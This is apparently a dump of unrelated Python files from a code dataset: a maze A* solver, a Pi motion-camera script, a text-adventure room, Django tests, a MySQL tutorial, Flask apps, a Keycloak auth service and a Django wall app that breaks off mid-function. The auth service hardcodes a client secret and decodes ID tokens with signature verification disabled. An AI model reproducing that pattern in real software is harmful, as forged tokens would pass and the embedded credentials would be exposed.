\r\n #print\r\n def __str__(self):\r\n output = ''\r\n for row in self._grid:\r\n output += ''.join([c.value for c in row]) + '\\n'\r\n return output\r\n\r\n def goal_test(self, location):\r\n return location == self.goal\r\n\r\n def successors(self, location):\r\n locations = []\r\n if location.row + 1 < self._rows and self._grid[location.row+1][location.column] != Cell.BLOCKED:\r\n locations.append(MazeLocation(location.row+1, location.column))\r\n if location.row - 1 >= 0 and self._grid[location.row-1][location.column] != Cell.BLOCKED:\r\n locations.append(MazeLocation(location.row-1, location.column))\r\n if location.column - 1 >= 0 and self._grid[location.row][location.column-1] != Cell.BLOCKED:\r\n locations.append(MazeLocation(location.row, location.column-1))\r\n if location.column + 1 < self._columns and self._grid[location.row][location.column+1] != Cell.BLOCKED:\r\n locations.append(MazeLocation(location.row, location.column+1))\r\n return locations\r\n \r\n def mark(self, path):\r\n for maze_location in path:\r\n self._grid[maze_location.row][maze_location.column] = Cell.PATH\r\n self._grid[self.start.row][self.start.column] = Cell.START\r\n self._grid[self.goal.row][self.goal.column] = Cell.GOAL\r\n \r\n def clear(self, path):\r\n for maze_location in path:\r\n self._grid[maze_location.row][maze_location.column] = Cell.EMPTY\r\n self._grid[self.start.row][self.start.column] = Cell.START\r\n self._grid[self.goal.row][self.goal.column] = Cell.GOAL\r\n\r\n#test\r\nm = Maze()\r\ndistance = manhattan_distance(m.goal)\r\nsolution = astar(m.start, m.goal_test, m.successors,distance)\r\nprint(solution.state)\r\nif solution is None:\r\n print('No Solution')\r\nelse:\r\n 
path = node_to_path(solution)\r\n m.mark(path)\r\n print(m)\r\n","sub_path":"A-Star search_python/Maze.py","file_name":"Maze.py","file_ext":"py","file_size_in_byte":3294,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"398466858","text":"import RPi.GPIO as GPIO\nimport time\nimport picamera\n\n# Setup PIR sensor\n#-----------------\n\niPIN_PIR1 = 7\niPIN_PIR2 = 23\n\nGPIO.setwarnings(False)\nGPIO.setmode(GPIO.BOARD) # identify by pin numbers (as opposed to GPIO numbers)\n\nGPIO.setup(iPIN_PIR1, GPIO.IN)\nGPIO.setup(iPIN_PIR2, GPIO.IN)\n\nstart_time = time.time()\nprev_state = False\ncurr_state = False\n\n# Setup camera\n#-------------\ncam = picamera.PiCamera()\ncam.resolution = (1296, 972)\n#cam.framerate = 25\n#time.sleep(2) #wait for automatic gain to settle\n#cam.shutter_speed = cam.exposure_speed\n#cam.exposure_mode = 'off'\ncam.hflip = True\ncam.vflip = True\ncam.capture('pirCamera_testimage.jpg')\n\n# Setup filestamping\n#-------------------\nt = time.localtime()\ntformat = '%Y-%m-%d-%H-%M-%S'\ntimestamp = 'emptyinit'\n\n\nprint(\"PIR + Camera test (ctrl-c to exit)\")\n\ntry:\n while True:\n time.sleep(0.5)\n prev_state = curr_state\n curr_state = GPIO.input(iPIN_PIR1) or GPIO.input(iPIN_PIR2)\n #print(\"state is \",curr_state)\n if curr_state != prev_state:\n new_state = \"HIGH\" if curr_state else \"LOW\"\n #print(\"GPIO pin %s is %s\" % (iPIN_PIR, new_state))\n if curr_state:\n #cam.start_preview()\n t = time.localtime()\n timestamp = time.strftime(tformat, t)\n cam.capture('movement-%s.jpg'%timestamp)\n print(\"Motion detected at %s\" % timestamp)\n else:\n #cam.stop_preview()\n print(\"No motion, time in HIGH state was %s s\" % (time.time()-start_time))\n start_time = time.time()\n\nexcept KeyboardInterrupt:\n print(\" Quit\")\n #Reset GPIO settings\n GPIO.cleanup()\n","sub_path":"02_pirCamera.py","file_name":"02_pirCamera.py","file_ext":"py","file_size_in_byte":1698,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"429413007","text":"from roomTile import RoomTile\nfrom functools import partial\n\n# author: Jason Watson\n\n# unique player actions in this room:\n# * sit on couch\n# * lie on couch\n# * sit on rocking chair\n# * put cassette in tape recorder: check inventory for cassette tape\n# * play recorder: check whether cassette tape is in recorder\n# * remove cassette from tape recorder: add cassette tape to inventory\n# * open/close door\n# * flip on/off light switch\n\n# Features in this room:\n# * flashlight required to see any features in this room. Still need to figure out how to make this work.\n# * light switch that doesn't work\n# * couch and coffee table. A tape recorder lies on the coffee table.\n\n\nclass LivingRoom(RoomTile):\n def __init__(self, x, y):\n super().__init__(x, y)\n self.x = x\n self.y = y\n self.visited = False\n self.name = \"Living Room\"\n self.light_on = False\n self.door_is_open = True\n self.recorder_with_tape = False\n self.sitting_in_rocking_chair = False\n self.sitting_on_couch = False\n self.lying_on_couch = False\n self.items = [self.recorder]\n\n # actions available in living room\n\n def turn_on_light(self):\n if not self.lying_on_couch and not self.sitting_on_couch and not self.sitting_in_rocking_chair:\n self.light_on = True\n print(\"\\nYou flip the light switch. 
Disappointed, it doesn't do anything!\\n\")\n else:\n print(\"\\nYou will need to get up if you want to do that!\\n\")\n\n def turn_off_light(self):\n if not self.lying_on_couch and not self.sitting_on_couch and not self.sitting_in_rocking_chair:\n self.light_on = False\n print(\"\\nDoesn't do anything.\\n\")\n else:\n print(\"\\nYou will need to get up if you want to do that!\\n\")\n\n @staticmethod\n def look_at_rocking_chair():\n print(\"\\nIt is a rocking chair. Thankfully, it is not moving now.\\n\")\n\n def sit_in_rocking_chair(self):\n self.sitting_in_rocking_chair = True\n print(\"\\nYou sit down. It is as comfortable as you would expect a wooden rocking chair to be.\\n\")\n\n def look_at_door(self):\n if self.door_is_open:\n print(\"\\nThe door is open.\\n\")\n elif not self.door_is_open:\n print(\"\\nThe door is closed. It is a normal looking door. It is unlocked.\\n\")\n\n @staticmethod\n def look_at_couch():\n print(\"\\nIt is an old and worn couch.\\n\")\n\n def sit_on_couch(self):\n self.sitting_on_couch = True\n print(\"\\nYou sit down. It is not comfortable at all. Still, it feels good to be off your feet!\\n\")\n\n def lie_on_couch(self):\n self.lying_on_couch = True\n print(\"\\nYou lie down. It is not comfortable at all. You begin to doze.\\n\")\n\n def get_up_from_chair(self):\n self.sitting_in_rocking_chair = False\n print(\"\\nYou stand up.\\n\")\n\n def get_up_from_couch(self):\n self.sitting_on_couch = False\n print(\"\\nYou stand up.\\n\")\n\n @staticmethod\n def look_at_table():\n print(\"\\nIt is a table. There is a tape recorder on top of it.\\n\")\n\n @staticmethod\n def look_at_tv():\n print(\"\\nIt is an old TV from the 1950s. It looks like it hasn't been in use for decades.\\n\")\n\n @staticmethod\n def turn_on_tv():\n print(\"\\nYou turn the TV on. It doesn't do anything.\\n\")\n\n @staticmethod\n def look_at_tv_stand():\n print(\"\\nIt's just a small table. There is nothing else on or around it of interest.\\n\")\n\n def play_recorder(self):\n if self.recorder.tape_in_recorder:\n self.recorder.play_recorder()\n else:\n print(\"You will need to find a cassette tape.\")\n\n def look_at_recorder(self):\n self.recorder.description()\n\n # remove cassette from inventory. Put cassette into tape recorder.\n # check inventory for cassette tape\n def put_cassette_in_recorder(self, item, player1):\n self.recorder.add_tape(item, player1)\n\n # add cassette to inventory. Remove cassette from tape recorder.\n def take_cassette_from_recorder(self, item, player1):\n self.recorder.remove_tape(item, player1)\n\n def open_door(self):\n if self.door_is_open:\n print(\"\\nThe door is already open!\\n\")\n elif not self.door_is_open:\n self.door_is_open = True\n print(\"\\nYou open the door.\\n\")\n\n def close_door(self):\n if self.door_is_open:\n self.door_is_open = False\n print(\"\\nYou close the door.\\n\")\n elif not self.door_is_open:\n print(\"\\nThe door is already closed!\\n\")\n\n def is_door_open(self):\n if self.door_is_open:\n print(\"\\nThe door to the east is open.\\n\")\n elif not self.door_is_open:\n print(\"\\nThe door to the east is closed.\\n\")\n\n def print_items_in_room(self):\n num_items = len(self.items)\n print(f\"\\nThere are {num_items} items in this room: \\n\")\n for x in range(len(self.items)):\n print(self.items[x])\n print(\"\\n\")\n\n @staticmethod\n def exits_from_room():\n print(\"\\nThere is a door to the east and an open entrance to the south.\\n\")\n\n # public method\n # call method when room is loaded. i.e. 
darkHall.room_description() when room is loaded.\n def room_description(self, player1):\n # first you will need to determine if the player already visited this room.\n # if visited, then print short description.\n # if not visited, then call long_room_description\n # both long and short description must check to see if there are items in the room.\n # print out the items in the room\n # first check to see if there are items in the room\n # you will need to eventually implement flashlight on method here.\n if self.visited:\n if len(self.items) == 0:\n print(\"\\n**********Living Room**********\\n\"\n \"\\nIt looks like a living room. There is a rocking chair in the corner, facing a boarded up\\n\"\n \"window. There is an old couch in the center of the room, and a coffee table in front of the\\n\"\n \"couch. There is what looks like a recorder on the table. Under the couch and coffee table is\\n\"\n \"a large woolen rug that has seen better days.\\n\"\n \"There is a light switch to the right of the doorway. There is an old TV leaning against\\n\"\n \"the wall on a TV stand.\\n\")\n self.is_door_open()\n self.exits_from_room()\n else:\n print(\"\\n**********Living Room**********\\n\"\n \"\\nIt looks like a living room. There is a rocking chair in the corner, facing a boarded up\\n\"\n \"window. There is an old couch in the center of the room, and a coffee table in front of the\\n\"\n \"couch. Under the couch and coffee table is a large woolen rug that has seen better days.\\n\"\n \"There is a light switch to the right of the doorway. There is an old TV leaning against\\n\"\n \"the wall on a TV stand.\\n\")\n self.is_door_open()\n self.print_items_in_room()\n self.exits_from_room()\n\n else:\n self.visited = True\n if len(self.items) == 0:\n self.long_room_description()\n self.is_door_open()\n self.exits_from_room()\n else:\n self.long_room_description()\n self.is_door_open()\n self.print_items_in_room()\n self.exits_from_room()\n\n def long_room_description(self):\n print(\"\\n**********Living Room**********\\n\"\n \"\\nYou are in a living room. It is a dark room. You can see a rocking chair creaking \\n\"\n \"and rocking back and forth in the corner of the room, facing a boarded \\n\"\n \"up window. The creaking quickly stops when the player notices it. There \\n\"\n \"is an old couch in the center of the room, and a coffee table in \\n\"\n \"front of the couch. Under the couch and coffee table is a large woolen rug that has seen better\\n\"\n \"days. There is a light switch to the right of the doorway. The rocking chair is\\n\"\n \"in the corner of the room. 
There is also an old TV set that looks like it's from the 1950s.\\n\"\n \"It leans against the wall on a TV stand.\\n\")\n\n def available_actions(self, player1, command):\n\n # Brendan's actions_dict idea.\n actions_dict = {\n 'turn on light': self.turn_on_light,\n 'turn off light': self.turn_off_light,\n 'open door': self.open_door,\n 'close door': self.close_door,\n 'look at recorder': self.look_at_recorder,\n 'look at table': self.look_at_table,\n 'look at chair': self.look_at_rocking_chair,\n 'sit in chair': self.sit_in_rocking_chair,\n 'look at couch': self.look_at_couch,\n 'sit on couch': self.sit_on_couch,\n 'lie on couch': self.lie_on_couch,\n 'get up from chair': self.get_up_from_chair,\n 'get up from couch': self.get_up_from_couch,\n 'look at tv': self.look_at_tv,\n 'turn on tv': self.turn_on_tv,\n 'look at tv stand': self.look_at_tv_stand,\n 'look at door': self.look_at_door,\n 'put cassette tape in recorder': partial(self.put_cassette_in_recorder, self.tape, player1),\n 'take cassette tape from recorder': partial(self.take_cassette_from_recorder, self.tape, player1),\n 'play recorder': self.play_recorder,\n }\n\n if command in actions_dict.keys():\n actions_dict[command]()\n elif command == \"go east\":\n if self.door_is_open:\n player1.move_east()\n elif not self.door_is_open:\n print(\"\\nYou will need to open the door!\\n\")\n self.room_description(player1)\n else:\n super().available_actions(player1, command)\n","sub_path":"CS 467/Capstone Project/livingRoom.py","file_name":"livingRoom.py","file_ext":"py","file_size_in_byte":10189,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"106127195","text":"from django.core.urlresolvers import reverse\nfrom model_mommy import mommy\nfrom rest_framework.test import APITestCase\n\n\nclass ChannelBaseTest(APITestCase):\n def setUp(self):\n self.channel = mommy.make(\n 'Channel',\n name='walmart'\n )\n\n\nclass ChannelListAPITest(ChannelBaseTest):\n def setUp(self):\n super().setUp()\n self.url_list = reverse('channel-list')\n\n def test_check_channel_on_list(self):\n response = self.client.get(self.url_list)\n results = response.data.get('results')\n channel_dict = {'name': 'walmart', 'slug': 'walmart'}\n self.assertIn(channel_dict, results)\n self.assertEqual(len(results), 1)\n\n def test_paginated_channel_list(self):\n mommy.make('Channel', name='teste', _quantity=100)\n response = self.client.get(self.url_list)\n results = response.data.get('results')\n self.assertEqual(len(results), 50)\n\n def test_invalid_post_method(self):\n data = {\n 'name': 'Walmart'\n }\n response = self.client.post(self.url_list, data)\n error_msg = response.data.get('detail')\n self.assertEqual(405, response.status_code)\n self.assertEqual('Method \"POST\" not allowed.', error_msg)\n\n\nclass ChannelDetailAPITest(ChannelBaseTest):\n def setUp(self):\n super().setUp()\n self.book = mommy.make(\n 'Category',\n name='Books',\n channel=self.channel\n )\n self.url_detail = reverse('channel-detail', kwargs={'slug': self.channel.slug})\n\n def test_check_fields(self):\n response = self.client.get(self.url_detail)\n data = response.data\n self.assertIn('slug', data)\n self.assertIn('name', data)\n self.assertIn('categories', data)\n\n def test_check_values_received(self):\n response = self.client.get(self.url_detail)\n data = response.data\n channel = self.channel\n self.assertEqual(channel.slug, data.get('slug'))\n self.assertEqual(channel.name, data.get('name'))\n 
self.assertEqual(channel.categories.all().count(), len(data.get('categories')))\n\n def test_invalid_put_method(self):\n data = {\n 'name': 'Walmart updated'\n }\n response = self.client.put(self.url_detail, data)\n error_msg = response.data.get('detail')\n self.assertEqual(405, response.status_code)\n self.assertEqual('Method \"PUT\" not allowed.', error_msg)\n\n def test_check_channel_categories(self):\n response = self.client.get(self.url_detail)\n data = response.data\n for item in self.channel.categories.values('name', 'slug'):\n self.assertIn(item, data.get('categories'))\n","sub_path":"marketplaces/tests/api/test_channel.py","file_name":"test_channel.py","file_ext":"py","file_size_in_byte":2734,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"78828555","text":"from collections import namedtuple\n\n\nclass UCHourHistogram:\n # h ranges from h0 to h3,the category of price\n def __init__(self, h, dict):\n self.h = h\n self.t = 0.0 # total_count\n for key, value in dict.items():\n if self.h in key:\n value = UCHourHistogram.satnatize_value(value)\n if 'total_count' in key:\n self.t = value\n\n @staticmethod\n def satnatize_value(self, v):\n if v == '' or v == None:\n return '0'\n if type(v) == unicode:\n return v.encode('unicode-escape').decode('string_escape')\n return str(v)\n\n @staticmethod\n def build(h, dict):\n tmp = namedtuple(\"UCHourHistogram\", dict.keys())(*dict.values())\n r = UCHourHistogram(tmp.h, {})\n r.t = tmp.t\n return r\n\n @staticmethod\n def add(h, uchour1_h, uchour2_h):\n result = UCHourHistogram(h, {})\n result.t = (uchour1_h.t) + (uchour2_h.t)\n return result\n\n @staticmethod\n def devide(uchour_h, length_days):\n if length_days == 0:\n return uchour_h\n result = UCHourHistogram(uchour_h.h, {})\n result.t = (float(uchour_h.t) / float(length_days))\n return result\n","sub_path":"Processes/imscommon/imscommon/model/uchourhistogram.py","file_name":"uchourhistogram.py","file_ext":"py","file_size_in_byte":1248,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"410678772","text":"import mysql.connector\n\nmydb = mysql.connector.connect(\n host=\"localhost\",\n user=\"root\",\n passwd=\"*******\",\n database=\"testdb\",\n)\n\n# print(mydb)\n\nmy_cursor = mydb.cursor()\n# mydb.cursor is just a instance of actual cursor\n\n# create db\nmy_cursor.execute(\"CREATE DATABASE testdb\")\n\n\n# show db\nmy_cursor.execute(\"SHOW DATABASES\")\nfor db in my_cursor:\n print(db)\n\n# creating table\nmy_cursor.execute(\n \"CREATE TABLE users (name VARCHAR(255), email VARCHAR(255), age INTEGER(10), user_id INTEGER AUTO_INCREMENT PRIMARY KEY)\")\n\n\n# showing tables\nmy_cursor.execute(\"SHOW TABLES\")\nfor table in my_cursor:\n print(table[0])\n\n\n# inserting into db\nsqlStuff = \"INSERT INTO users (name, email, age) VALUES (%s, %s, %s)\"\nrecord1 = (\"John\", \"john@codemy.com\", 40)\n\nmy_cursor.execute(sqlStuff, record1)\nmydb.commit()\n\n\n# inserting many records\nsqlStuff = \"INSERT INTO users (name, email, age) VALUES (%s, %s, %s)\"\nrecords = [\n (\"Johnny\", \"johnny@codemy.com\", 41),\n (\"Johnathon\", \"johnathon@codemy.com\", 36),\n (\"Joma\", \"joma@codemy.com\", 45),\n]\n\nmy_cursor.executemany(sqlStuff, records)\nmydb.commit()\n\n\n# showing data\nmy_cursor.execute(\"SELECT * FROM users\")\nresult = my_cursor.fetchall()\nfor row in result:\n print(row)\n # print(row[1])\n\n# Pull Data from the table\nmy_cursor.execute(\"SELECT * FROM users\")\nresult = 
my_cursor.fetchall()\nprint(\"NAME\\tEMAIL\\t\\t\\tAGE\\tID\")\nprint(\"----\\t-----\\t\\t\\t---\\t---\")\nfor row in result:\n print(row[0] + \"\\t%s\" %row[1]+ \"\\t\\t%s\" %row[2]+ \"\\t%s\" %row[3])\n\n\n# where clause\nmy_cursor.execute(\"SELECT * FROM users WHERE name = 'john'\")\nresult = my_cursor.fetchall()\nfor row in result:\n print(row)\n\n\n# where like and wildcards\nmy_cursor.execute(\"SELECT * FROM users WHERE name LIKE 'j%'\")\nresult = my_cursor.fetchall()\nfor row in result:\n print(row)\n\n\n# AND / OR clause\nmy_cursor.execute(\"SELECT * FROM users WHERE name LIKE 'j%' AND age>40\")\nresult = my_cursor.fetchall()\nfor row in result:\n print(row)\n\n\n# Updating record\nmy_sql = \"UPDATE users SET age = 17 WHERE user_id = 3\"\nmy_cursor.execute(my_sql)\nmydb.commit()\n\n# Limiting the results\nmy_cursor.execute(\"SELECT * FROM users LIMIT 2 OFFSET 1\")\nresult = my_cursor.fetchall()\nfor row in result:\n print(row)\n\n\n# Order by\nmy_cursor.execute(\"SELECT * FROM users ORDER BY age ASC\")\nresult = my_cursor.fetchall()\nfor row in result:\n print(row)\n\n\n# DELETE record\nmy_sql = \"DELETE FROM users WHERE user_id = 1\"\nmy_cursor.execute(my_sql)\nmydb.commit()\n\n# DELETE / DROP table\nmy_sql = \"DROP TABLE IF EXISTS users\"\nmy_cursor.execute(my_sql)\n","sub_path":"database.py","file_name":"database.py","file_ext":"py","file_size_in_byte":2558,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"467334765","text":"from http.server import HTTPServer, BaseHTTPRequestHandler\nimport sys\nimport time\n\nip = '127.0.0.1'\nport = 8000\naddr = (ip, port)\n\nclass myHTTPHandle(BaseHTTPRequestHandler):\n def do_GET(self):\n self.send_response(200)\n self.send_header('Content-type', 'text/html')\n self.end_headers()\n self.wfile.write(bytes('

        <html><body>{}</body></html>
        '.format(time.ctime()), 'utf-8'))\n\nhttpd = HTTPServer(addr, myHTTPHandle)\nservip, servport = httpd.socket.getsockname()\nprint('Serving HTTP on {}, port {}'.format(servip, servport))\n\ntry:\n httpd.serve_forever()\nexcept KeyboardInterrupt:\n httpd.server_close()\n sys.exit(0)","sub_path":"Books/GodOfPython/P16_Networking/basehttpServer.py","file_name":"basehttpServer.py","file_ext":"py","file_size_in_byte":657,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"216571817","text":"#!/usr/bin/env python\nimport odoorpc\nimport base64\n\n#wiz_id = 9\n#wiz_id = 12\n#wiz_id = 25\n#wiz_id = 27\n#wiz_id = 28\nwiz_id = 32\no = odoorpc.ODOO.load('vf_prod')\nwiz_o = o.env['bc_subscription_usability.invoice_subscription_wizard']\nsp_o = o.env['stock.picking']\n\nwizard = wiz_o.browse(wiz_id)\nprint('STATE', wizard.state)\nif wizard.state == 'klarna':\n\twizard.new_create_packing_slips()\n\twizard.new_create_parcelfile()\n\nprint('STATE?', wizard.state)\n\nf = open('packingslips.pdf', 'w')\nf.write(base64.b64decode(wizard.packing_slips))\nf.close()\n\nf = open('parcellist.xls', 'w')\nf.write(base64.b64decode(wizard.parcel_list))\nf.close()\n","sub_path":"attic/customer_specific_utils/ventilasjonsfilter/abo/get_docs.py","file_name":"get_docs.py","file_ext":"py","file_size_in_byte":631,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"465008565","text":"from flask import Flask, render_template\napp = Flask(__name__)\n\n@app.route('/')\ndef home_page():\n\tlikes_beer_pong=False\n\tsenders=[\"mtvjesse\",\"kyle\",\"905 shooter\",\"holden cuming\"]\n\treturn render_template(\n\t\t\"index.html\",\n\t\tsenders=senders,\n\t\tlikes_beer_pong = likes_beer_pong\n\t\t)\n\n\n \n\nif __name__ == '__main__':\n app.run(debug = True)","sub_path":"exercises/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":338,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"51183841","text":"# - Run all scripts\r\nSCRIPT0 = \"annotate_DataSets.py\"\r\nSCRIPT1 = \"extract_IntentCSVs.py\"\r\nSCRIPT2 = \"merge_CSVModels.py\"\r\n\r\n# Add or remove as necessary\r\nprocessingScripts = [SCRIPT1, SCRIPT2]\r\n\r\nfor i in processingScripts:\r\n exec(open(i).read())","sub_path":"StandaloneDataProcessing/runAll.py","file_name":"runAll.py","file_ext":"py","file_size_in_byte":249,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"641333204","text":"import http.client\n\nimport json\n\nimport jwt\n\nimport datetime\n\nfrom flask_jwt_extended import create_access_token\n\ndef sign_api_token(user):\n expiry_on = datetime.timedelta(days=1)\n jwt_token = create_access_token(identity={'user_id': user, 'nickname': 'parce'}, expires_delta=expiry_on)\n return jwt_token\n\ndef _get_id_token(auth_code):\n conn = http.client.HTTPSConnection(\"dev.login.jala-one.com\")\n auth_url = '/auth/realms/traveler/protocol/openid-connect/token'\n client_id = 'traveler-app'\n redirect_uri = 'http://localhost:5000/auth'\n client_secret = '90460353-da00-439b-baf8-c7a06c9a49ba'\n\n payload = f'grant_type=authorization_code&client_id={client_id}&client_secret={client_secret}&code={auth_code}&redirect_uri={redirect_uri}'\n\n\n #payload = f'grant_type=authorization_code&client_id={client_id}&code={auth_code}&redirect_uri={redirect_uri}'\n\n\n headers = { 'content-type': 'application/x-www-form-urlencoded' }\n\n print(f'URI = {auth_url} 
and payload is {payload}') \n\n conn.request('POST', auth_url, payload, headers)\n\n res = conn.getresponse()\n data = res.read()\n print(data.decode('utf-8'))\n\n return json.loads(data.decode('utf-8'))\n\ndef verify_user(auth_code, public_key):\n id_token = _get_id_token(auth_code)['id_token']\n decoded = jwt.decode(id_token, public_key, algorithms='RS256', verify=False, \n options={'JWT_DECODE_AUDIENCE' : 'traveler-app', 'JWT_IDENTITY_CLAIM' : 'jti'} )\n return decoded['email'], id_token\n\n","sub_path":"flask/code/P13.AuthJala/services/auth_service.py","file_name":"auth_service.py","file_ext":"py","file_size_in_byte":1515,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"247969095","text":"\"\"\"\nCreated on Dec 5, 2019\n\n@author: cbowles\n\"\"\"\n\nimport fileinput\nfrom typing import List\n\nfrom IntCode import IntCode\n\n\ndef main():\n for line in fileinput.input():\n stack: List[int] = [int(x) for x in line.split(',')]\n\n intcode = IntCode(stack)\n\n intcode.inpt(1)\n while not intcode.is_halted():\n print(intcode.run())\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"Day05/5_Asteroids.py","file_name":"5_Asteroids.py","file_ext":"py","file_size_in_byte":401,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"585501452","text":"# Functions for analyzing and extracting interesting data\n\n# Load libraries\nimport pandas as pd\n\n# Count medals function with arbitrary number of arguments\ndef count_medals_n(df_orig, *arg):\n \"\"\"\n Gives back number of medals groupby several attributes: *arg\n\n Input:\n df_orig: DataFrame\n *arg: column to get number of \"Medal\"\n \n Returns:\n df_best: new DataFrame\n \"\"\"\n # Remove all NaN (no medal won == NaN)\n df_medals = df_orig[df_orig['Medal'].notna()]\n \n # count medals by column_name\n\n args_list = list(arg)\n args_list.append(\"Medal\")\n df_medals = df_medals.groupby(args_list).count().reset_index()\n\n # \"ID\" column stands for the sum of medals\n args_list.append(\"ID\")\n df_medals = df_medals.loc[:, args_list]\n \n # Changes dataframe from long to wide\n args = list(arg)\n df_medals = df_medals.pivot(index=args, columns=\"Medal\", values=\"ID\")\n\n # replace all NAs by 0\n df_medals.fillna(0, inplace=True)\n\n # generate Total, avoid using for-loop in pandas dataframe\n df_medals[\"Total\"] = df_medals[\"Gold\"] + df_medals[\"Silver\"] + df_medals[\"Bronze\"]\n \n # change type and change indeces to columns\n df_medals = df_medals.astype(int).reset_index(inplace=False)\n\n # Give back new dataframe\n return df_medals\n","sub_path":"analyze_functions.py","file_name":"analyze_functions.py","file_ext":"py","file_size_in_byte":1310,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"377394263","text":"\"\"\"empty message\n\nRevision ID: 5665b5e38768\nRevises: 3f8599f1ba77\nCreate Date: 2015-01-23 11:17:17.040830\n\n\"\"\"\n\n# revision identifiers, used by Alembic.\nrevision = '5665b5e38768'\ndown_revision = '3f8599f1ba77'\n\nfrom alembic import op\nimport sqlalchemy as sa\n\nfrom datetime import datetime\n\n\ndef upgrade():\n ### commands auto generated by Alembic - please adjust! 
###\n op.add_column('logfiles', sa.Column('added_time', sa.DateTime(),\n # We let the old values be\n # empty as we'll probably just\n # drop them.\n nullable=True,\n default=datetime.now()))\n ### end Alembic commands ###\n\n\ndef downgrade():\n ### commands auto generated by Alembic - please adjust! ###\n op.drop_column('logfiles', 'added_time')\n ### end Alembic commands ###\n","sub_path":"migrations/versions/5665b5e38768_.py","file_name":"5665b5e38768_.py","file_ext":"py","file_size_in_byte":944,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"210750872","text":"from apps.wallApp.models import Comment, Message\nfrom django.shortcuts import render, redirect, HttpResponse\nfrom django.http import JsonResponse\n#from .models import Message, Comment\nfrom datetime import datetime, timedelta\nfrom ..loginApp.models import User\nfrom django.utils import timezone\nimport math\n\n\ndef created_at_msg(miDateTime):\n timeDiff = timezone.now()-miDateTime #es un timedelta que tiene .days, .seconds, .microseconds\n if timeDiff.seconds < 120:\n return f\"Posteado hace 1 minuto\"\n elif timeDiff.seconds < 3600:\n minutos, resto = divmod(timeDiff.total_seconds(),60)\n return f\"Posteado hace {round(minutos)} minutos\"\n elif timeDiff.total_seconds() < 3600*24:\n horas, resto = divmod(timeDiff.seconds,3600)\n minutos = math.floor(resto/60)\n if horas == 1:\n if minutos > 0:\n return f\"Posteado hace 1 hora y {minutos} minutos\"\n else:\n return \"Posteado hace 1 hora\"\n elif (horas < 4):\n if minutos > 0:\n return f\"Posteado hace {horas} horas y {minutos} minutos\"\n else:\n return f\"Posteado hace {horas} horas\"\n else:\n return f\"Posteado hace {round(horas)} horas\"\n else:\n return f\"Posteado el {miDateTime.strftime('%d-%m-%Y')} a las {miDateTime.strftime('%H:%M')}\"\n\ndef minutesElapsed(miDateTime):\n return secondsElapsed(miDateTime)/60\n\ndef secondsElapsed(miDateTime):\n #miTimePostgres = User.objects.raw(\"SELECT NOW()\")[0]\n #print(f\"postgres NOW: {miTimePostgres}\")\n #print(f\"postgres: {miDateTime}\")\n #print(f\"now: {datetime.now()}\")\n \n #now = timezone.now()\n\n timeDiff = timezone.now()-miDateTime #es un timedelta que tiene .days, .seconds, .microseconds\n return timeDiff.total_seconds()\n\ndef wallIndex(request,id):\n\n if (\"id\" not in request.session) or (request.session[\"id\"] <= 0):\n return redirect('signin')\n\n context = {\n \"messages\" : Message.objects.filter(user_for_id = id).order_by('-created_at'),\n \"user\" : User.objects.get(id = id),\n #\"user_poster\" : User.objects.get(id = request.session[\"id\"]),\n }\n return render(request,'wall.html',context)\n\ndef postMessage(request):\n \n message = request.POST[\"message\"]\n\n createdMessage = {}\n\n if message != \"\": \n newmessage = Message.objects.create(\n message = message,\n user_id = request.session[\"id\"],\n user_for_id = request.POST[\"id_for\"],\n )\n print(\"new message posted!\")\n if \"tipo\" in request.POST: #armar el createdMessage\n createdMessage[\"id\"] = newmessage.id\n createdMessage[\"message\"] = (newmessage.message).replace(\"<\",\"<\").replace(\">\",\">\")\n user = {\n \"first_name\":newmessage.user.first_name,\n \"last_name\":newmessage.user.last_name,\n \"full_name\":newmessage.user.full_name,\n \"id\":newmessage.user.id,\n }\n createdMessage[\"user\"] = user\n createdMessage[\"created_at\"] = newmessage.created_at\n createdMessage[\"created_at_text\"] = \"Hace menos de 1 minuto\"\n\n if \"tipo\" in request.POST: #js\n 
print(\"by ajax\")\n return JsonResponse(createdMessage)\n else:\n print(\"by server\")\n return redirect(f\"/users/show/{request.POST['id_for']}\")\n\n\ndef postComment(request):\n\n comment = request.POST[\"comment\"]\n \n createdComment = {}\n\n if comment != \"\": \n newcomment = Comment.objects.create(\n comment = comment,\n user_id = request.session[\"id\"],\n message_id = request.POST[\"message_id\"]\n )\n print(\"new comment posted!\")\n if \"tipo\" in request.POST: #armar el createdComment\n createdComment[\"id\"] = newcomment.id\n \n createdComment[\"comment\"] = (newcomment.comment).replace(\"<\",\"<\").replace(\">\",\">\")\n user = {\n \"first_name\":newcomment.user.first_name,\n \"last_name\":newcomment.user.last_name,\n \"full_name\":newcomment.user.full_name,\n \"id\":newcomment.user.id,\n }\n createdComment[\"user\"] = user\n createdComment[\"created_at\"] = newcomment.created_at\n createdComment[\"created_at_text\"] = \"Hace menos de 1 minuto\"\n\n if \"tipo\" in request.POST: #js\n print(\"by ajax\")\n return JsonResponse(createdComment)\n else:\n print(\"by server\")\n url = f\"/users/show/{request.POST['id_for']}#divcomment-{newcomment.id}\"\n return redirect(url)\n\ndef delMessage(request):\n \n idMsg = request.POST[\"message_id\"]\n message = Message.objects.get(id = idMsg)\n\n response = {}\n\n if 